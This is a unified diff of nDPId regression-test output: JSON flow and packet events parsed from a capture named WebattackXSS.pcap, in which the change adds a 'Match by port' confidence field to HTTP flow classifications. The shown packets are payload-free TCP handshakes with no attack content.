 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348020357,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348020357,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MF5AAD4GlXKsEAABwKgKMok4AFAr8NuwAAAAAKACchDgrwAAAgQFtAQCCAoBPOvuAAAAAAEDAwc="}
@@ -3584,17 +3584,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DoBAAD4Gt1CsEAABwKgKMomWAFBGnvpCAAAAAKACchCePQAAAgQFtAQCCAoBPPTCAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":2,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348029395,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiZaKxK9BRp76Q6AScSCa+QAAAgQFtAQCCAoD5sY2ATz0wgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":3,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DoFAAD4Gt1esEAABwKgKMomWAFBGnvpDisSvQoAQAOU6AQAAAQEICgE89MID5sY2"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348030687,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348030687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1499348030687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gAJAAD4GRc6sEAABwKgKMomkAFDF6nYHAAAAAKACchCh2wAAAgQFtAQCCAoBPPYFAAAAAAEDAwc="}
@@ -3616,15 +3616,15 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/dAAD4GNdmsEAABwKgKMon0AFAYNXJgAAAAAKACchBLVgAAAgQFtAQCCAoBPP2XAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":2,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348038438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQifSSwJxVGDVyYaAScSBKLgAAAgQFtAQCCAoD5s8KATz9lwEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":3,"flow_last_seen":1499348038438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/hAAD4GNeCsEAABwKgKMon0AFAYNXJhksCcVoAQAOXpNQAAAQEICgE8\/ZcD5s8K"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348040840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
